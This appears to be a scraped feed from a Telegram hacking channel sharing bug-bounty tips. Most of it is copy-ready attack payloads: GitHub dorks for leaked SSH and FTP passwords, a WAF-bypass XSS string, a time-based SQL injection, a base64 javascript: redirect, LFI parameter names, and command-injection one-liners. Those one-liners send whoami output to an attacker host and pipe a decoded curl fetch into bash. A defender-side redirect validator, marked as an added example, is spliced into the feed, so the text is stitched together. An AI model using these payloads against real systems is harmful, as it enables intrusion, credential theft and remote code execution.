BugCod3
ɪɴ ᴛʜᴇ ɴᴀᴍᴇ ᴏꜰ ɢᴏᴅ

[ BugCod3 ] — From Shadows To Shells ⚡️

🕶 Hacking | 🐞 Bug Bounty | 🔐 Security Tools
⚔️ Learn • Hunt • Dominate

🌐 Group: t.iss.one/BugCod3GP
📂 Topic: t.iss.one/BugCod3Topic

🤖 Contact: t.iss.one/BugCod3BOT
📧 Email: [email protected]
ffuf - Fuzz Faster U Fool
A fast web fuzzer written in Go.

Installation
Download a prebuilt binary from the releases page, unpack and run!

or

If you are on macOS with Homebrew, ffuf can be installed with:
brew install ffuf

or

If you have a recent Go compiler installed:
go install github.com/ffuf/ffuf/v2@latest
(the same command works for updating)

or

git clone https://github.com/ffuf/ffuf ; cd ffuf ; go get ; go build

Ffuf depends on Go 1.16 or greater.

GitHub

#Web #InfoSec #Fuzzer

👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
The new cs.github.com search allows for regex, which means brand new regex GitHub Dorks are possible!

E.g., find SSH and FTP passwords via connection strings with:
/ssh:\/\/.*:.*@.*target\.com/
/ftp:\/\/.*:.*@.*target\.com/

#infosec #cybersecurite #bugbountytip

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Bypass Cloudflare WAF (XSS without parentheses)

javascript:var{a:onerror}={a:alert};throw%20document.domain


#xss #bugbountytips #infosec

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
🔥New Triaged report SQL Injection 😍 > Payload used time-based PoC.

,%27%29%20AND%20%28SELECT%209683%20FROM%20%28SELECT%28SLEEP%285%29%29%29FKuq%29--%20wXyW


MySQL

#bugbountytip #infosec

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
I found a URL like this:
https://domain.io/redirect?url=some_base_64_encoded_string

Encoded javascript:alert("Xss by vikas") to base64 like:
amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=

Now the new URL is like this:
https://domain.io/redirect?url=amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=

📘 Twitter

#bugbounty #xss #infosec

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
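
A defender-side check for the base64 redirect parameter described in the post above, as an added example that is not part of the original post. It assumes a Node.js handler; ALLOWED_HOSTS, FALLBACK and checkRedirectParam are hypothetical names, and the allow-list contents are an assumption.

```javascript
// Added example (not from the post). ALLOWED_HOSTS, FALLBACK and
// checkRedirectParam are hypothetical names; the allow-list is an assumption.
const ALLOWED_HOSTS = new Set(["domain.io", "www.domain.io"]);
const FALLBACK = "/";

function reject(reason) {
  return { ok: false, target: FALLBACK, reason };
}

// Decode the base64 `url` parameter and decide where the redirect may go.
function checkRedirectParam(param) {
  if (typeof param !== "string" || param.length === 0 || param.length > 2048) {
    return reject("length");
  }
  // Buffer.from() silently skips invalid characters, so validate the alphabet first.
  if (!/^[A-Za-z0-9+\/_-]+={0,2}$/.test(param)) return reject("encoding");
  const decoded = Buffer.from(param, "base64").toString("utf8");

  let url;
  try {
    url = new URL(decoded); // absolute URLs only; "//host" and "/path" throw here
  } catch {
    return reject("parse");
  }
  // Check the parsed scheme, not a string prefix: the parser already strips
  // tabs/newlines, so "java\tscript:" cannot slip past as a different scheme.
  if (url.protocol !== "https:") return reject("scheme");
  if (url.username || url.password) return reject("userinfo");
  if (!ALLOWED_HOSTS.has(url.hostname)) return reject("host");
  // Return the normalised href so the caller never redirects to the raw input.
  return { ok: true, target: url.href, reason: null };
}

// Constructed sample inputs (the first is the value quoted in the post).
const b64 = (s) => Buffer.from(s, "utf8").toString("base64");
const samples = [
  "amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=",
  b64("https://domain.io/account"),
  b64("https://domain.io@evil.example/"),
  b64("//evil.example/"),
];
for (const s of samples) console.log(s, "->", JSON.stringify(checkRedirectParam(s)));
```

The caller redirects only to the returned target, which is either the normalised allow-listed URL or the fallback path.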
JSON Smuggling: A far-fetched intrusion detection evasion technique

🔗 Medium

#infosec #cybersecurity #blueteam

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
LFI Vulnerability Testing: Key Parameters

?dir={payload}
?action={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?include={payload}
?page={payload}
?locate={payload}
?site={payload}

#BugBounty #infosec

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
OS Command Injection ⚔️

curl${IFS}$(whoami).atckr

echo${IFS}Y3VybCBodHRwOi8vdTBfYTIxNS1sb2NhbGhvc3QuYXR0YWNrZXIK|base64${IFS}-d|bash

curl${IFS}atckr?$(whoami)

echo${IFS}Y3VybCBodHRwOi8vYXR0YWNrZXI/dTBfYTIxNT1sb2NhbGhvc3QK|base64${IFS}-d|bash

#InfoSec #CyberSec #BugBounty #Tip

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
🔥 [remote] Ivanti Endpoint Manager Mobile 12.5.0.0 - Authentication Bypass

🔗 Read / Download

#BugCod3 #security #bugbounty #infosec

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
How this seasoned bug bounty hunter combines Burp Suite and HackerOne to uncover high-impact vulnerabilities
Arman S., a full-time independent security researcher and bug bounty hunter, talked us through how he uses Burp Suite Professional and HackerOne in tandem to find and report high-value security vulner

🔗 Read more

#BugCod3 #security #bugbounty #infosec #portswigger

👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3